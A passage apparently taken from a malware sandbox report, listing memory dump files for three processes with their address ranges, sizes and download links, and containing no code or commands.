memory/2112-27-0x0000000002D00000-0x0000000002D80000-memory.dmp

Filesize
512KB

Download
memory/2112-28-0x0000000002D00000-0x0000000002D80000-memory.dmp

Filesize
512KB

Download
memory/2112-41-0x0000000002D00000-0x0000000002D80000-memory.dmp

Filesize
512KB

Download
memory/2112-82-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-22-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-24-0x0000000002D00000-0x0000000002D80000-memory.dmp

Filesize
512KB

Download
memory/2112-21-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

Filesize
2.9MB

Download
memory/2112-42-0x0000000002D00000-0x0000000002D80000-memory.dmp

Filesize
512KB

Download
memory/2112-37-0x0000000002D00000-0x0000000002D80000-memory.dmp

Filesize
512KB

Download
memory/2112-36-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-23-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/2808-52-0x0000000076FD6000-0x0000000076FD7000-memory.dmp

Filesize
4KB

Download
memory/2808-81-0x00000000002A0000-0x00000000002E2000-memory.dmp

Filesize
264KB

Download
memory/2808-88-0x0000000025780000-0x00000000257C0000-memory.dmp

Filesize
256KB

Download
memory/2808-87-0x000000006E870000-0x000000006EF5E000-memory.dmp

Filesize
6.9MB

Download
memory/2808-84-0x0000000025780000-0x00000000257C0000-memory.dmp

Filesize
256KB

Download
memory/2808-83-0x000000006E870000-0x000000006EF5E000-memory.dmp

Filesize
6.9MB

Download
memory/2808-80-0x00000000002A0000-0x0000000001302000-memory.dmp

Filesize
16.4MB

Download
memory/2808-54-0x00000000002A0000-0x0000000001302000-memory.dmp

Filesize
16.4MB

Download
memory/2808-53-0x0000000076FA0000-0x0000000077076000-memory.dmp

Filesize
856KB

Download
memory/2808-51-0x0000000076DB0000-0x0000000076F59000-memory.dmp

Filesize
1.7MB

Download
memory/3000-38-0x0000000002890000-0x00000000028D0000-memory.dmp

Filesize
256KB

Download
memory/3000-50-0x0000000076FA0000-0x0000000077076000-memory.dmp

Filesize
856KB

Download
memory/3000-49-0x0000000002890000-0x00000000028D0000-memory.dmp

Filesize
256KB

Download
memory/3000-35-0x0000000072DF0000-0x000000007339B000-memory.dmp

Filesize
5.7MB

Download
memory/3000-34-0x0000000002890000-0x00000000028D0000-memory.dmp

Filesize
256KB

Download
memory/3000-48-0x0000000076DB0000-0x0000000076F59000-memory.dmp

Filesize
1.7MB

Download
memory/3000-39-0x0000000002890000-0x00000000028D0000-memory.dmp

Filesize
256KB

Download
memory/3000-33-0x0000000072DF0000-0x000000007339B000-memory.dmp

Filesize
5.7MB

Download
memory/3000-47-0x0000000072DF0000-0x000000007339B000-memory.dmp

Filesize
5.7MB

Download
memory/3000-45-0x0000000006780000-0x000000000BEC0000-memory.dmp

Filesize
87.2MB

Download
memory/3000-44-0x0000000005620000-0x0000000005621000-memory.dmp

Filesize
4KB

Download
memory/3000-43-0x0000000002890000-0x00000000028D0000-memory.dmp

Filesize
256KB

Download